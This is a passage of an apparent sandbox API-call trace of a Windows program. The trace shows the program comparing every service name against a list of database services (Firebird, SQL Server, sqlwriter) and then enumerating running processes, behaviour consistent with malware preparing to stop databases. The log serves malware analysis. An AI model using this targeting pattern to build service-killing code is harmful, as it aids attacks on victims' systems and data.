(lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0194.439] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0194.439] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0194.439] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0194.439] lstrlenW (lpString="Dhcp") returned 4 [0194.439] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0194.439] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0194.439] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0194.439] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0194.439] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0194.439] lstrlenW (lpString="Dnscache") returned 8 [0194.439] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0194.439] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0194.439] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0194.439] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0194.439] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0194.439] lstrlenW (lpString="DPS") returned 3 [0194.439] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0194.439] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0194.439] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0194.439] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0194.439] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0194.439] lstrlenW (lpString="DusmSvc") returned 7 [0194.439] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0194.439] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0194.439] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0194.439] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0194.439] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0194.439] lstrlenW (lpString="EventLog") returned 8 [0194.439] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0194.439] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0194.439] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0194.439] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0194.440] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0194.440] lstrlenW (lpString="EventSystem") returned 11 [0194.440] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0194.440] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0194.440] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0194.440] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0194.440] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0194.440] lstrlenW (lpString="FontCache") returned 9 [0194.440] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0194.440] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0194.440] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0194.440] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0194.440] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0194.440] lstrlenW (lpString="gpsvc") returned 5 [0194.440] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0194.440] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0194.440] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0194.440] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0194.440] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0194.440] lstrlenW (lpString="iphlpsvc") returned 8 [0194.440] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0194.440] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0194.440] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0194.440] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0194.440] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0194.440] lstrlenW (lpString="KeyIso") returned 6 [0194.440] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0194.441] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0194.441] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0194.441] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0194.441] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0194.441] lstrlenW (lpString="LanmanServer") returned 12 [0194.441] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0194.441] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0194.441] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0194.441] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0194.441] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0194.441] lstrlenW (lpString="LanmanWorkstation") returned 17 [0194.441] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0194.441] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0194.441] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0194.441] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0194.441] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0194.441] lstrlenW (lpString="lfsvc") returned 5 [0194.441] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0194.441] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0194.441] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0194.441] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0194.441] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0194.441] lstrlenW (lpString="lmhosts") returned 7 [0194.441] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0194.441] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0194.441] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0194.441] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0194.441] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0194.442] lstrlenW (lpString="LSM") returned 3 [0194.442] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0194.442] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0194.442] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0194.442] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0194.442] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0194.442] lstrlenW (lpString="MpsSvc") returned 6 [0194.442] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0194.442] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0194.442] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0194.442] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0194.442] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0194.442] lstrlenW (lpString="NcbService") returned 10 [0194.442] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0194.442] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0194.442] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0194.442] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0194.442] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0194.442] lstrlenW (lpString="netprofm") returned 8 [0194.442] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0194.442] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0194.442] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0194.442] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0194.442] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0194.442] lstrlenW (lpString="NgcSvc") returned 6 [0194.442] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0194.442] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0194.443] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0194.443] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0194.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0194.443] lstrlenW (lpString="NlaSvc") returned 6 [0194.443] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0194.443] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0194.443] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0194.443] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0194.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0194.443] lstrlenW (lpString="nsi") returned 3 [0194.443] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0194.443] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0194.443] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0194.443] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0194.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0194.443] lstrlenW (lpString="PcaSvc") returned 6 [0194.443] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0194.443] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0194.443] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0194.443] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0194.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0194.443] lstrlenW (lpString="PlugPlay") returned 8 [0194.443] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0194.443] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0194.443] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0194.443] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0194.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0194.444] lstrlenW (lpString="Power") returned 5 [0194.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0194.444] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0194.444] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0194.444] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0194.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0194.444] lstrlenW (lpString="ProfSvc") returned 7 [0194.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0194.444] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0194.444] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0194.444] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0194.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0194.444] lstrlenW (lpString="RpcEptMapper") returned 12 [0194.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0194.444] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0194.444] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0194.444] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0194.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0194.444] lstrlenW (lpString="RpcSs") returned 5 [0194.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0194.444] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0194.444] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0194.444] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0194.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0194.444] lstrlenW (lpString="SamSs") returned 5 [0194.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0194.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0194.445] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0194.445] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0194.445] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0194.445] lstrlenW (lpString="Schedule") returned 8 [0194.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0194.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0194.445] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0194.445] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0194.445] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0194.445] lstrlenW (lpString="SecurityHealthService") returned 21 [0194.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0194.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0194.445] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0194.445] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0194.445] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0194.445] lstrlenW (lpString="SENS") returned 4 [0194.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0194.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0194.445] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0194.445] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0194.445] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0194.445] lstrlenW (lpString="ShellHWDetection") returned 16 [0194.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0194.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0194.445] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0194.445] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0194.446] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0194.446] lstrlenW (lpString="Spooler") returned 7 [0194.446] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0194.446] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0194.446] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0194.446] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0194.446] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0194.446] lstrlenW (lpString="StateRepository") returned 15 [0194.446] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0194.446] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0194.446] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0194.446] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0194.446] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0194.446] lstrlenW (lpString="SysMain") returned 7 [0194.446] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0194.446] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0194.446] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0194.446] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0194.446] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0194.446] lstrlenW (lpString="SystemEventsBroker") returned 18 [0194.446] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0194.446] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0194.446] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0194.446] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0194.446] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0194.446] lstrlenW (lpString="Themes") returned 6 [0194.446] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0194.447] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0194.447] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0194.447] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0194.447] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0194.447] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0194.447] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0194.447] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0194.447] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0194.447] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0194.447] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x358 [0194.451] Process32FirstW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.452] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0194.452] lstrlenW (lpString="System") returned 6 [0194.452] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0194.453] lstrlenW (lpString="smss.exe") returned 8 [0194.453] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0194.457] lstrlenW (lpString="csrss.exe") returned 9 [0194.457] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0194.457] lstrlenW (lpString="wininit.exe") returned 11 [0194.457] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0194.458] lstrlenW (lpString="csrss.exe") returned 9 [0194.458] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0194.459] lstrlenW (lpString="winlogon.exe") returned 12 [0194.459] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0194.460] lstrlenW (lpString="services.exe") returned 12 [0194.460] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0194.461] lstrlenW (lpString="lsass.exe") returned 9 [0194.461] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0194.462] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0194.462] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0194.462] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0194.462] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.463] lstrlenW (lpString="svchost.exe") returned 11 [0194.463] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.464] lstrlenW (lpString="svchost.exe") returned 11 [0194.464] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0194.479] lstrlenW (lpString="dwm.exe") returned 7 [0194.479] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.480] lstrlenW (lpString="svchost.exe") returned 11 [0194.480] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.481] lstrlenW (lpString="svchost.exe") returned 11 [0194.481] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.481] lstrlenW (lpString="svchost.exe") returned 11 [0194.481] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.482] lstrlenW (lpString="svchost.exe") returned 11 [0194.482] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.483] lstrlenW (lpString="svchost.exe") returned 11 [0194.483] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.483] lstrlenW (lpString="svchost.exe") returned 11 [0194.483] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.484] lstrlenW (lpString="svchost.exe") returned 11 [0194.484] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.485] lstrlenW (lpString="svchost.exe") returned 11 [0194.485] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.486] lstrlenW 